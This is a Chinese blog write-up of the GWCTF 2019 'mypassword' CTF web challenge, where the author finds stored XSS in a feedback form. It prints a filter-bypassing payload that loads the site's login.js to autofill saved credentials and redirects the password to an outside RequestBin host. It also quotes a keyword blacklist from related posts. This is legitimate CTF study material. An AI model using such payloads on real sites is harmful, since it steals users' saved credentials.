[GWCTF 2019]mypassword-做题记录

最新推荐文章于 2023-03-01 19:50:14 发布
最新推荐文章于 2023-03-01 19:50:14 发布
阅读量425 收藏
点赞数
分类专栏: web学习 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/114748319
版权

[GWCTF 2019]mypassword-做题记录
在这里插入图片描述
这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。
那就找找源代码看看有没有有价值的东西
在这里插入图片描述
只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧
在这里插入图片描述
登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的
在这里插入图片描述
在这里插入图片描述
去看看别的页面,feedback.php这里应该是可以提交信息,然后在list.php会显示出信息,感觉这里问题挺大的,那就继续试
在这里插入图片描述
点进去就会看到你输入的信息
在这里插入图片描述
在这里插入图片描述

看来他应该是把script给过滤掉了,我也在上面的id处尝试了下sql注入,没啥用,头疼,再试试别的。
在这里插入图片描述
在这里插入图片描述
函数执行不了,还是没啥用,但是这个<?php>没有显现出来,而是在源代码里,证明它并不是憨憨的把你输入的东西完整的打印出来,可以试试别的html标签,感觉有搞头
在这里插入图片描述
在这里插入图片描述
牛逼,点了后可以成功跳转,看来这里应该就是问题所在了,感觉有xss

然就不知道怎么做了,不懂怎么利用这里,找了个大佬的WP看看
在这里插入图片描述
在这里插入图片描述
卧槽,居然能过,长见识了,然后大佬试了个xss,也没成
再看看login.js的代码

if (document.cookie && document.cookie != '') {
	var cookies = document.cookie.split('; ');
	var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
		var arr = cookies[i].split('=');
		var key = arr[0];
		cookie[key] = arr[1];
	}
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
		document.getElementsByName("username")[0].value = cookie['user'];
		document.getElementsByName("password")[0].value = cookie['psw'];
	}

用户名和密码都填入了表单
这时候就要介绍我们的http://http.requestbin.buuoj.cn
网址,(RequestBin提供了一个URL,该URL将收集对其发出的请求,首页点击create a requestbin)
构造POC

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/rd45c1rd/?a="+psw;
</scrcookieipt

在这里插入图片描述
成功解决战斗

参考文章
https://www.cnblogs.com/karsa/p/13528643.html

lmonstergg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 320
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
最新发布
qq_41755084的博客
08-09 404
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
[GWCTF 2019]mypassword
qq_43801002的博客
04-26 1553
#题目: 三个界面,注册界面源代码毛都没有,登录界面源代码里面有东西 if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++)...
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 706
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
MyPassword:为您生成和管理密码的 Android 应用
06-29
在MyPassword-master这个压缩包文件中,我们可能看到的是该项目的源代码仓库,包括了项目的各个模块、资源文件、配置文件等。开发者可能使用Git进行版本控制,便于协作和代码管理。如果深入研究源代码,我们可以更...
MyPassword
04-08
在MyPassword的压缩包文件中,我们看到只有一个名为"MyPassword"的文件,这通常意味着它可能是一个自包含的应用程序,包含了所有必要的运行库和资源。用户只需双击这个文件,就能启动密码管理器,开始管理和保护自己...
MyPassword:安卓
04-30
【压缩包子文件的文件名称列表】"MyPassword-master" 告诉我们这是一个Git仓库的主分支(master分支)的下载,通常包含了项目的源代码、资源文件、构建脚本和其他相关材料。在这样的目录结构下,我们可以期待找到...
[GWCTF 2019]mypassword XSS
qq_54929891的博客
06-22 405
放假
BUUCTF__[GWCTF 2019]mypassword_题解
风过江南乱的博客
04-29 906
BUUCTF__[GWCTF 2019]mypassword_题解 XSS获取admin cookie
【代码审计】buu_[GWCTF 2019]mypassword
serendipity1130的博客
06-09 570
1.页面打开像是注入,现注册登录后发现并非注入,如下:2.在登陆界面发现./js/login.js,打开查看到如下的js代码: 代码解读:代码会把cookie中的username和password填进当前表单思路:由于是后端执行js,所以构造js即可。先写一个有表单的页面,调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求,就能得到管理员cookie。现在看在哪里以及如何发送请求。3.由于在各页面查看源码,在首页发现feedback.php:打开其源码可看到注释:代码分
BUUCTF:[GWCTF 2019]mypassword
末初的CSDN博客
04-06 2052
注册登录 这里加载了一个js文件 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn/js/login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {};...
buu刷题(第一周)
qq_62046696的博客
03-01 939
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
BUU刷题记录——4
weixin_43610673的博客
08-31 1813
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3318
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
[GWCTF 2019]枯燥的抽奖
06-30 110
查看源代码发现,输入框中的内容提交给check.php,输入check.php发现可以查看源码。 fSFdLI1f9Y <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed'...
openssl des3 -salt -k 用法
06-08
openssl des3 -salt -k [password] [options] [input_file] [output_file] 该命令使用DES算法的3个密钥(即Triple DES)对输入文件...- 解密文件:openssl des3 -d -salt -k mypassword -in input.des3 -out output.txt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值